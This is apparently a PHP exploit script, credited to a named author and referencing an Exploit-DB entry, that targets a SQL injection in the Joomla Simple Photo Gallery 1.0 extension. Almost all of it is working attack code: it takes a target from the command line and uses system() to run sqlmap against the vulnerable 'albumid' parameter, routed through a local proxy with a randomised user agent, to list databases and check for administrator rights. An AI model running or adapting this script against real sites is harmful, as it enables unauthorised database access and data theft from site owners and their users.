[MINI EXPLOIT] Joomla Simple Photo Gallery 1.0 - SQLI

1. <?php
2. # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
3. # Blog:          http://blog.inurl.com.br
4. # Twitter:       https://twitter.com/googleinurl
5. # Fanpage:       https://fb.com/InurlBrasil
6. # Pastebin       http://pastebin.com/u/Googleinurl
7. # GIT:           https://github.com/googleinurl
8. # PSS:           http://packetstormsecurity.com/user/googleinurl/
9. # YOUTUBE        https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
10. # REF:           http://www.exploit-db.com/exploits/36385/
11. set_time_limit(0);
12. echo "[+]  MINI exploit-SQLMAP / Joomla Simple Photo Gallery 1.0 - SQL injection\n";
13. $target = isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}")  : exit("\n0x[ERRO] DEFINE TARGET!\n");
14. $command = "sqlmap -u '{$target}/index.php?option=com_simplephotogallery&view=images&albumid=1' -p albumid --batch --dbms=MySQL --proxy 'http://localhost:8118' --random-agent --level 2 --risk 1 --eta --answers='follow=N' --dbs --is-dba";
15. system($command, $dados).empty($dados[0]) ? exit() : NULL;